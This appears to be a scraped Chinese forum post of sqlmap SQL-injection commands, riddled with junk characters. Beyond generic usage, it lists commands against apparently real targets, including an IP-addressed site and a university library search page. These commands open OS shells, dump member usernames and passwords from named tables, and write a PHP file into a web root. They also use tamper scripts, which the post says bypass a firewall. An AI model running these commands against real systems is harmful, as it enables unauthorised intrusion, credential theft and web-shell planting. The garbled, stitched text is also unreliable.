sqlmap使用实例

admin

/pentest/database/sqlmap
" s) P" e3 O; a$ G: _
update :::::>     in the folder   after  execute    following   order : svn update
0 v& s/ e$ E/ H# u* f3 W, s
0 C/ }: d& z' Zsqlmap.py -r 1.txt --current-db
! {; {, U% |+ S% e) i
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
& U+ U* q) N( m2 ^- M( l* [
6 ]5 U1 w$ j- ^& j+ w, W==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
" U$ E9 ]% {+ `& ?7 V6 f+ I. f猜解数据库
./sqlmap.py -u "injection-url" --dbs
% {" z# |5 e0 K, S  Qsqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
; x9 n! Q# `* K- Q$ R
+ P: d' b, U7 _4 C4 l) J, h+ \* e猜解表名
./sqlmap.py -u "injection-url" -D database_name --tables

% e7 P( K1 n1 c3 tsqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"

  v- P' _8 J( b/ r' csqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
7 U2 k  P2 Q# |: U' n
2 N! ~9 V* [4 L9 G2 Q* k" Usqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
* u" Z; ~0 R7 S% e% f9 Hsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
8 C3 @* h* Y" b6 {' bsqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
( s- z5 X# ?  L
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
. {+ F; n4 m4 Asqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
. I7 D3 H$ H+ k5 Bsqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
3 Q5 o9 W) d4 x) Usqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump

sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
3 h  I. H" q5 D! P4 Ysqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"

2 l+ ]1 E0 G, z6 T3 |7 g  B; tsqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
猜解列名
# D: ?+ g) [4 H: m" S./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
/ f& s" l8 n( |; M7 @
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
7 @7 p6 w& e& P. _- B$ Q! D
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
9 H$ ^9 Q0 E3 T- I&submit=Go
猜解值
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
$ q  n8 L3 X6 v) h, P========================================================
/ S: J% \  @6 w搜索表名中包括mana字符的
/sqlmap.py -u "injection-url" -T mana --search
返回一个交互式sql shell
- n! o- L1 ^( W0 I/sqlmap.py -u "injection-url" --sql-shell
读取指定文件（需权限）
( M4 o, {3 w+ k( R, V, ^/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
' O7 k* u% A  }+ d. T5 U9 M+ b) v查看当前 用户 及 数据库
/sqlmap.py -u "injection-url" --current-user --current-db
: D0 A' ]- @9 ?; i2 G* \$ U本地文件 写入 远程目标绝对路径
- n1 O  T' m& [' D" {/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
: a1 p) S% j+ K9 U' G% f$ f! b9 e6 @sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"

& e- ~8 F9 ~4 f* ]- G3 i8 h  u+ Tsqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
查看某用的权限
8 n1 y0 \2 y% Y4 \' l4 l% G/sqlmap.py -u "injection-url" --privileges -U root
: a% X. o  s( y7 \; Z6 z& D' ~5 ?查看当前用户是否为dba
' `: l) ]4 K: D6 u3 ~/sqlmap.py -u "injection-url" --is-dba
+ \9 L; P6 K( f% N读取所有数据库用户或指定数据库用户的密码
sqlmap.py -r 1.txt --users --passwords
3 C, _, N( ^7 S! G' u" B" |8 @  K+ k0 csqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"

/sqlmap.py -u "injection-url" --passwords -U root
7 k8 g4 p8 Y( D+ H+ S9 @" l! E
--start&&--stop 与 --first&&--last 的区别
3 G. P' x, Q4 p7 w9 }7 A/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   （--start=1 --stop=2 会列出第二条记录。。。。记录例如：0 1 2 3 ……）

; {* Z  N7 X/ ^8 X9 V6 W, S从字典中查找(属于暴利破解)存在的表（sqlmap/txt/common-tables.txt）或字段（sqlmap/txt/common-columns.txt）
% l! o# f" Q, J8 o! G/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
2 ^1 T1 e8 |; y. u8 S/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns

  P. Z/ \0 X, q; v+ O; G3 Q执行sql语句，如查询@@datadir得到数据库路径（或者user()/database()等等……）
" s* o/ \! H9 D" D0 l/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"

4 S) h! D$ R, z+ Y8 D) I4 O